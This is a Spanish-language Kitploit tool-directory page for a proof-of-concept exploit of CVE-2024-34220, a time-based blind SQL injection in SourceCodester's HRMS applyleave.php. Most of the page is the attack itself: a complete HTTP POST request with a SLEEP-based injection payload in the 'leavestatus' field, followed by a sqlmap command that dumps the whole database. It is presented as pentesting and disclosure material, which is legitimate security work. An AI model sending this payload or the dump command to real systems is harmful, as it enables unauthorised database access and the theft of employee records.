Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-34220 — Exploit de prueba de concepto para CVE-2024-34220, una vulnerabilidad de inyección SQL ciega basada en tiempo en SourceCodester HRMS applyleave.php, con automatización de sqlmap para extracción de bases de datos. | Kitploit
Herramientas/GitHubGitHub/dovankha/cve-2024-34220
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubdovankha/cve-2024-34220

CVE-2024-34220

Exploit de prueba de concepto para CVE-2024-34220, una vulnerabilidad de inyección SQL ciega basada en tiempo en SourceCodester HRMS applyleave.php, con automatización de sqlmap para extracción de bases de datos.

Ver Repositorio
2hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Proyecto de Sistema de Gestión de Recursos Humanos en PHP y MySQL Código Fuente Gratuito

Presentado por: Kha Do

Vendedor: SourceCodester

VERSIÓN AFECTADA Y/O CORREGIDA

Archivo Vulnerable

applyleave.php

TIPO DE PROBLEMA

Tipo de Vulnerabilidad

Inyección SQL

Impacto

Los atacantes pueden explotar esta vulnerabilidad para obtener privilegios de base de datos, lo que puede resultar en una gran cantidad de datos en la base de datos. Si la base de datos de la otra parte tiene privilegios de DBA, puede llevar a la obtención de privilegios de host del servidor.

POC

Payload

root@kitploit:~
POST /hrm/user/applyleave.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 149
Origin: http://localhost
Connection: close
Referer: http://localhost/hrm/user/applyleave.php
Cookie: PHPSESSID=2v2v2al4dkd4iir9cl5j7oikvr
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
X-PwnFox-Color: cyan

leavestatus=5'+AND+(SELECT+1337+FROM+(SELECT(SLEEP(5)))VSgR)+AND+'Kha'%3d'123&reason=+++&startdate=03%2F04%2F2024&enddate=29%2F04%2F2024&Apply=Submit

Después de ejecutar este Payload, el tiempo de retorno de los datos se retrasa 5 segundos, lo que indica que podemos haber ejecutado con éxito "sleep(5)". En este caso, el retraso puede ser varias veces. Lo verificaremos a continuación: SQL_Injection

Después de ejecutar este Payload, el tiempo de retorno de los datos se retrasa 20 segundos, lo que indica que podemos haber ejecutado con éxito "sleep(20)". En este caso, el retraso puede ser varias veces. Lo verificaremos a continuación: SQL_Injection_1

SQLmap

root@kitploit:~
sqlmap -r <item request> --dump

sqlmap

Descargar herramienta